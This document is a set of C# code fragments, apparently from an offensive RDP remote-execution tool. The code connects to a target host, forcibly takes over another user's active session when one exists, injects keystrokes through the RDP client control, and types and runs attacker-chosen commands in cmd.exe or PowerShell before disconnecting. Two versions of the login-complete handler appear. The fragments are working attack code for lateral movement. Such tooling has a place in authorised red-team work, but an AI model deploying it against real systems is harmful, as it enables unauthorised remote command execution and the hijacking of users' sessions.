private void RdpConnectionOnOnLogonError(object sender, IMsTscAxEvents_OnLogonErrorEvent e) { LogonErrorCode = e.lError; var errorstatus = Enum.GetName(typeof(LogonErrors), (uint)LogonErrorCode); Console.WriteLine("[-] Logon Error : {0} - {1}", LogonErrorCode, errorstatus); Thread.Sleep(1000); if (LogonErrorCode == -5 && takeover == true) { // it doesn't go to the logon event, so this has to be done here var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender; Thread.Sleep(1000); keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx(); Console.WriteLine("[+] Another user is logged on, asking to take over session"); SendElement("Tab"); Thread.Sleep(500); SendElement("Enter+down"); Thread.Sleep(500); SendElement("Enter+up"); Thread.Sleep(500); Console.WriteLine("[+] Sleeping for 30 seconds"); Task.Delay(31000).GetAwaiter().GetResult(); Marshal.ReleaseComObject(rdpSession); Marshal.ReleaseComObject(keydata); } else if (LogonErrorCode != -2) { Environment.Exit(0); } }
public unsafe static void Send(Keys[] keyCodes, ServerBase serverBase) { Server serverNode = serverBase.ServerNode; RdpClient client = serverNode.Client; IMsRdpClientNonScriptable msRdpClientNonScriptable = (IMsRdpClientNonScriptable)client.GetOcx(); int num = keyCodes.Length; try { SendKeysData sendKeysData = default(SendKeysData); bool * ptr = (bool *)sendKeysData.keyUp; int * ptr2 = sendKeysData.keyData; int num2 = 0; for (int i = 0; i < num && i < 10; i++) { int num3 = (int)Util.MapVirtualKey((uint)keyCodes[i], 0u); sendKeysData.keyData[num2] = num3; sendKeysData.keyUp[num2++] = 0; if (!IsModifier(keyCodes[i])) { for (int num4 = num2 - 1; num4 >= 0; num4--) { sendKeysData.keyData[num2] = sendKeysData.keyData[num4]; sendKeysData.keyUp[num2++] = 1; } msRdpClientNonScriptable.SendKeys(num2, ref *ptr, ref *ptr2); num2 = 0; } } } catch { } }
private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e) { var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender; Console.WriteLine("[+] Connected to : {0}", target); Thread.Sleep(1000); keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx(); if (LogonErrorCode == -2) { Console.WriteLine("[+] User not currently logged in, creating new session"); Task.Delay(10000).GetAwaiter().GetResult(); } string privinfo = "non-elevated"; if (runtype != string.Empty) { privinfo = "elevated"; } Console.WriteLine("[+] Execution priv type : {0}", privinfo); Thread.Sleep(1000); SendElement("Win+R+down"); Thread.Sleep(500); SendElement("Win+R+up"); Thread.Sleep(1000); if (execwith == "cmd") { RunConsole("cmd.exe"); } else if (execwith == "powershell" || execwith == "ps") { RunConsole("powershell.exe"); } else { RunRun(); } Thread.Sleep(1000); Console.WriteLine("[+] Disconnecting from : {0}", target); rdpSession.Disconnect(); }
private void RdpConnectionOnOnLoginComplete(object sender, EventArgs e) { if (LogonErrorCode == -2) { Console.WriteLine($"[+] User not currently logged in, creating new session"); Task.Delay(10000).GetAwaiter().GetResult(); } var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender; Console.WriteLine("[+] Connected to : {0}", target); Thread.Sleep(1000); keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx(); string enterdown = "Enter+down"; string enterup = "Enter+up"; Thread.Sleep(1000); SendElement("Win+R+down"); Thread.Sleep(500); SendElement("Win+R+up"); Thread.Sleep(1000); if (execwith == "cmd") { Console.WriteLine("[+] Executing {0} from cmd.exe", cmd.ToLower()); SendText("cmd.exe"); Thread.Sleep(1000); SendElement(enterdown); Thread.Sleep(500); SendElement(enterup); Thread.Sleep(500); SendText(cmd.ToLower()); Thread.Sleep(1000); SendElement(enterdown); Thread.Sleep(500); SendElement(enterup); Thread.Sleep(500); SendText("exit"); } else if (execwith == "powershell" || execwith == "ps") { Console.WriteLine("[+] Executing {0} from powershell.exe", cmd.ToLower()); SendText("powershell.exe"); Thread.Sleep(1000); SendElement(enterdown); Thread.Sleep(500); SendElement(enterup); Thread.Sleep(500); SendText(cmd.ToLower()); Thread.Sleep(1000); SendElement(enterdown); Thread.Sleep(500); SendElement(enterup); Thread.Sleep(500); SendText("exit"); } else { Console.WriteLine("[+] Executing {0}", cmd.ToLower()); SendText(cmd.ToLower()); Thread.Sleep(1500); SendElement(enterdown); Thread.Sleep(500); SendElement(enterup); } Thread.Sleep(1000); Console.WriteLine("[+] Disconnecting from : {0}", target); rdpSession.Disconnect(); }